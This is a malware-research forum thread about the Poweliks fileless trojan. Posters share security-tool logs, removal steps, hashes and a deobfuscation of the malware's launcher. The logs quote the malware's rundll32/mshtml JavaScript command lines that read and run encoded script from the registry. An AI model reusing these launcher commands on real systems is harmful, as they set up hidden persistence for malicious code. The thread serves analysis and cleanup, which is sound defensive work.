Win32/Poweliks

Forum for analysis and discussion about malware.
User avatar
EP_X0FF
Global Moderator
Posts: 4888
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Sun Aug 03, 2014 3:03 pm

Everything already attached here.

Besides from usual copy-pasting AV "analysts" added few mistakes, especialyl I like TrendMicro piece of shit analysis (not to mention how incomplete it):

Just a f*cken FYI to all of these "malware analysts": there is no ZwXxx in usermode. All ZwXxx are equal to NtXxx. If you do the analysis, do not be like the ignorant trojan authors who just use Zw prefix because all code learned/copy-pasted for years from incompetent Gary Nebbett book.
Last edited by EP_X0FF on Mon Aug 04, 2014 1:32 pm, edited 2 times in total.
Reason: edit: fixed mistake with SHA1 report
Ring0 - the source of inspiration
Quads
Posts: 148
Joined: Thu May 06, 2010 10:19 pm
Location: New Zealand

Tue Aug 05, 2014 7:23 am

Possibly an Poweliks key in FRST log and not Za as MBAM /MBAR detected as

InvalidSubkeyName: [HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\ <*>] <===== ATTENTION

From 5 days ago.

Quads
User avatar
EP_X0FF
Global Moderator
Posts: 4888
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Wed Aug 06, 2014 3:32 am

Post to idiotic analysis disaproved.

Excuse but such low quality shit (level of hackforums and opensc) is not for this place. Especially when it starts with this nonsense:
At entry point of first sample, it does have some odd API calls:
* Call to IsCharSpaceW("8") which is false
* Loop through each letter of "CLEAR" text using StrChrW and IsCharAlphaW which will return true per each letter
* Call to lstrcmpiW with two arguments "NEST" and "NEST", so basically it will also return true
* Call to OpenProcess with 0 as PID argument.
* Call to GetSystemDirectoryA
* Call to GetFileInformationByHandle and passing NULL as handle.
* Add non-unicode "BASIC" string into global atom table using Unicode version of GlobalAddAtomW API.
* Call to SizeofResource with NULL as hResource and hModule arguments.
* Call to IsDBCSLeadByteEx with 0x839 as codepage argument and 0x23 as testchar argument. As 0x23 is not a lead byte, it will always return 0.
Cryptor random generated junk is not a entry point rofl, why should I explain such a noob things?

junk, carefully described by this homemade virus analyst (he can try itself at McAfee or TrendMicro, their companies full of such "analysts")
Image

entry point of malware, feel the difference.
Image
This file is compressed using MPRESS version 0.81-2.xx
FYI for the idiot: MPRESS version is stored as plain text in compressed file header.
Ring0 - the source of inspiration
User avatar
Naathim
Posts: 1
Joined: Thu May 29, 2014 12:15 pm

Fri Aug 29, 2014 12:13 pm

Hello.

Looks like there is some nev variant of Poweliks, which infects another CLSID (or maybe it's just the XP speciality), which I'm fighting here: https://forums.malwarebytes.org/index.p ... le-issues/
Aside of forged run subkey, there is another one:
[HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\******<*>]

Does anybody have a dropper for it?
Quads
Posts: 148
Joined: Thu May 06, 2010 10:19 pm
Location: New Zealand

Fri Aug 29, 2014 5:45 pm

The Registry key(s) have a null in, That is why FRST, Roguekiller etc struggle in removing the key(s) even if they say they have done so.

A test I did with Poweliks on my system (no VM or SandBox etc), Took longer due to me just testing FRST and Roguekiller a few weeks ago. There can alsways be new Reg key changes by Poweliks


Poweliks in log FRST

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [**a<*>] => rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\current (the data entry has 31 more characters). <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1 (the data entry has 824 more characters).

InvalidSubkeyName: [HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\******<*>] <===== ATTENTION


Try removal

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**a<*> => Value Deleted Successfully.
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
[HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\******<*>] => Subkey with invalid name deleted successfully.


Rescan, oh 2 keys still there, try again

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [**a<*>] => rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\current (the data entry has 31 more characters). <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1 (the data entry has 824 more characters).

Try removal, round 2


HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**a<*> => Value Deleted Successfully.
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.

Still holding in location, check null


Microsoft Windows [Version 6.1.7601]
Copyright © 2009 Microsoft Corporation. All rights reserved.

C:\Users\Marewa>C:\Users\John\Desktop\regdelnull hku -s

RegDelNull v1.10 - Delete Registry keys with embedded Nulls
Copyright © 2005-2006 Mark Russinovich
Sysinternals - www.sysinternals.com

Null-embedded key (Nulls are replaced by '*'):

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\Cu
rrentVersion\Run\|*|

Delete? (y/n)


Ok try the one other tool (Roguekiller)


[Tr.Poweliks] HKEY_USERS\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run | ?a : rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>") -> DELETED

Now check for the 2 entries

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1 (the data entry has 824 more characters).
InvalidSubkeyName: [HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\******<*>] <===== ATTENTION

Nope still there, time to remove Null


Microsoft Windows [Version 6.1.7601]
Copyright © 2009 Microsoft Corporation. All rights reserved.

C:\Users\Marewa>C:\Users\John\Desktop\regdelnull hku -s

RegDelNull v1.10 - Delete Registry keys with embedded Nulls
Copyright © 2005-2006 Mark Russinovich
Sysinternals - www.sysinternals.com

Null-embedded key (Nulls are replaced by '*'):

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\Cu
rrentVersion\Run\|*|

Delete? (y/n) y

key successfully deleted.

Scan complete



Check for the 2 entries, OK, one left, null is now gone



HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1 (the data entry has 824 more characters).


HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.

Completed, Poweliks gone


If tools are struggling or cannot remove a item for poweliks check for a null

Quads
User avatar
Tigzy
Posts: 384
Joined: Mon Feb 07, 2011 5:03 pm

Thu Sep 18, 2014 11:55 am

It looks like it's a new variant:
HASH: bddea208f612c06322c21def1546182b

http://forum.adlice.com/index.php/topic ... tml#msg690

How can this be deobfuscated? (between eval() )
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
User avatar
EP_X0FF
Global Moderator
Posts: 4888
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Thu Sep 18, 2014 12:15 pm

A very simple.

1) Remove dots from string
2) Decrease each code symbol by 1
3) For each new element CharFromCode

Code: Select all

epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb6e:45c3fccc1::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*document.write('<script language=jscript.encode>'+(new ActiveXObject('WScript.Shell')).RegRead('HKCR\\clsid\\{73e709ea5d934b2ebbb099b7938da9e4}\\localserver32\\a')+'</script>'
Tigzy wrote:It looks like it's a new variant:
HASH: bddea208f612c06322c21def1546182b

http://forum.adlice.com/index.php/topic ... tml#msg690

How can this be deobfuscated? (between eval() )
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
Ring0 - the source of inspiration
User avatar
Tigzy
Posts: 384
Joined: Mon Feb 07, 2011 5:03 pm

Thu Sep 18, 2014 1:27 pm

Oh, yes I haven't seen that part (Charcode) :D
User avatar
Intimacygel
Posts: 24
Joined: Wed Jun 05, 2013 3:16 pm

Thu Sep 18, 2014 3:49 pm

TwinHeadedEagle wrote:Does someone have these hashes?

4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb
e8d6943742663401e5c44a5fa9cfdd8fad6a9a0dc0f886dc77c065a86c0e10aa

Or this one?

BFA2DC3B9956A88A2E56BD6AB68D1F4F675A425A

4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb
AND
BFA2DC3B9956A88A2E56BD6AB68D1F4F675A425A
are identical files just a different hash.

Here are your two files.
You do not have the required permissions to view the files attached to this post.
Quads
Posts: 148
Joined: Thu May 06, 2010 10:19 pm
Location: New Zealand

Mon Sep 29, 2014 3:03 am

Does anyone know if after using FRST to remove this key for Poweliks on a Win 7 x64 OS

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}

If the Registry key has to be repaired to

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}]
@="Thumbnail Cache Class Factory for Out of Proc Server"
"AppID"="{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
@="C:\\Windows\\system32\\thumbcache.dll"
"ThreadingModel"="Apartment"

As importing a .reg file fails

Quads
Post Reply